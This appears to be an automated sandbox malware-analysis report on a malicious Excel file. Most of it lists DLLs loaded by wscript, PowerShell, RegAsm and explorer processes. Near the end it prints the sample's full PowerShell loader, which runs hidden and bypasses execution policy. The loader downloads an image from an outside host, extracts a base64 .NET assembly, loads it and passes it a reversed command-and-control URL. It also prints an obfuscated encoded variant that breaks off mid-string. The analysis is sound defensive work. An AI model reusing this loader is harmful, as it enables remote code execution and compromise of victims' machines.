Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rugtucw	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: duser.dll
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: duser.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: duser.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: duser.dll
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: duser.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: duser.dll
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: duser.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: duser.dll
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: webio.dll

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.454053406.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: RegAsm.pdb source: rugtucw, 00000010.00000000.504303884.0000000000F92000.00000020.00000001.01000000.00000009.sdmp, rugtucw.14.dr
Source:	Binary string: RegAsm.pdb4 source: rugtucw, 00000010.00000000.504303884.0000000000F92000.00000020.00000001.01000000.00000009.sdmp, rugtucw.14.dr
Source:	Binary string: F:\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256 source: powershell.exe, 0000000C.00000002.454053406.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.471104189.00000000082D0000.00000004.08000000.00040000.00000000.sdmp

Source: #20240627_Edlen_A.xls

Initial sample: OLE indicators vbamacros = False

Source: #20240627_Edlen_A.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTr